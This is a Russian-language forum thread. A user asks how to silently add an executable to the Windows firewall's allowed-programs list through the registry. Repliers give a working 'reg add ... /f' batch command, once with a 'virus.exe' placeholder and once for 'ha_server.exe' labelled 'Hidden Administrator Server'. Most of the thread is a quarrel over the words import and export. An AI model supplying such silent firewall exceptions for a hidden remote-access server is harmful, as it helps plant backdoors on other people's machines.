Здравствуйте! хочу создать bat файл, который автоматический импортирует в реестер нужный мне файл в фоновом режиме, скажем, нажал на bat файл и все! он записался в реестор... ничего не надо подтверждать... немогу никак найти как сделать( вот [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\] "C:\\Documents and Settings\\файл.exe"="C:\\Documents and Settings\\файл.exe:*:Enabled:название" это в xp, а в виндовс 7 так же сделать или как?
Нужно открыть курсы "Как найти нужную информацию в интернете? Узнай как эффективно использовать поисковые системы!"...
это ж каким извращенцем надо быть, что бы пихать весь ехе в реестр... Хотя зависит от целей. Стандартный пример записываешь директорию: using Microsoft.Win32; RegistryKey saveKey = Registry.LocalMachine.CreateSubKey("software\\....."); saveKey.SetValue("имя ключа","данные которые хочешь записать"); saveKey.Close(); Вытаскиваешь ехе using Microsoft.Win32; RegistryKey readKey = Registry.LocalMachine.OpenSubKey("software\\....."); string loadString = (string)readKey.GetValue("имя ключа"); readKey.Close(); Делаешь открытие по loadString... Вариант №2 для извращенцев ехе в байты -> к стрингу -> запись всего это в реестр -> вытаскивание ключа со строкой -> преобразование в байты -> преобразование масива байтов в ехе
@not4me что то я не вижу что бы ТС упоминал шарп, или на чем горазды на том и рады? И про какое "запихивания целого файла в реестр" идет речь?
Есть такое в самом в reg32 - Import/Export веток регистра. Сливал, и текст-редактором делалось Поиск/Замена. Цель была - замена дефолтных фолдеров Win на Lin названия, /bin, /home. Кровь, пот и слёзы.
1) regedit с параметров -s имяфайла сделает что тебе надо 2) т.к. пишешь в HKEY_LOCAL_MACHINE то на Win 7 и Win Vista тебе понадобится повышенный уровень UAC. И если UAC на отключен, то по любому выскочит его окошко, а если не выскачит, что ничего не запишется.
воспользуйся командой reg в консоли можешь почитать хелп,там все доступно изложено. вот как то так будет reg add hklm\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\virus.exe" /t REG_SZ /d "C:\virus.exe:*:Enabled:virus" /f
DooD я добавил свои параметры и сохранил в bat что то не получилось( вот код: [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\] "C:\\Documents and Settings\\ha_server.exe"="C:\\Documents and Settings\\ha_server.exe:*:Enabled:Hidden Administrator Server" как нужно правильно сделать?
короче,вот как выглядит батник: reg add hklm\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\StandardProf ile\AuthorizedApplications\List /v "C:\Documents and Settings\ha_server.exe" /t REG_SZ /d "C:\Documents and Settings\ha_server.exe:*:Enabled:Hidden Administrator Server" /f pause скопируй и возрадуйся все.
экспорт это сохранение ветки или параметра из реестра как правило в reg файл.а импорт это внесение В реестр.так что оффтоп написал ты.
тоесть импорт по твоему это:"который автоматически импортирует в реестр нужный мне фаил" ?? Ему надо файл -> реестр - это товарисчь как-раз таки и есть экспорт
И никак иначе. Спор перетёк в выяснение личных отношений. Попробуйте выполнить Export, затем Import - всё наглядно и понятно.
тоесть если я хочу из россии продать что-то в америку - я им импортирую чтоль свой товар. Ему надо - фаил в реестр, это экспорт файла в реестр. Если бы надо простой текст в реестр засунуть ( НЕ ФАЙЛ! А ТЕКСТ! ) то это был бы импорт уже
вот это ты мочишь я те отвечаю...причем тут файл или нет?реестр это база данных своего рода,которая содержит информацию,или ты думаешь в нем файлы хранятся как на винте?
Вотс мотри. У тебя есть БД на локальном компе. 1) Я тебе скидываю файл, и ты его грузишь например коммандой:"C:\1.db mysql\base#1" ну типа грузишь мой файл в свою БД. Это разве не экспорт файла ? Экспорт! 2) А если я тебе скидываю в ЛС протой текст, и ты уже го добавляешь в свою БД через интерфейс - это что тогда будет ? Это будет импорт. ТС'у надо первый вариант - файл экспортировать в реестр!
Вы с информатикой знакомы? Нет, не экспорт. текст ничем не отличается от файла! Если не врубаешь, лучше промолчи
да конечно незнаком - куда мне уж. И программы для работы с БД писал как с MySQL так и с Access ( защита диплома ) А тут какаято информатика. 1) "C:\1.db MySQL\db#1" (пример) 2) "Зайти на http://localhost/phpmyadmin/...." (пример) В первом случае вы отправляете файл, где из него дастается текст и запихивается строками. Т.е. вы берете фаил и отправляете какой либо программе - это экспорт файла в стороннее приложение Во втором случае вы ж евставляете текст и нажимаете:"Добавить", тем самым вы импортируете текст в свои таблицы. Это и есть импорт. Просто опираясь на ваши мысли, будет правельно не:"Россия экспортирует свой товар в страны СНГ" а вот так:"СНГ импортирует товар России". Но особое участие принимает Россия т.к. изготаливает товар. И она будет экспортировать товар Так же и тут. В файле есть текст - надо фаил отправить на обработку в программу, собственно экспорт!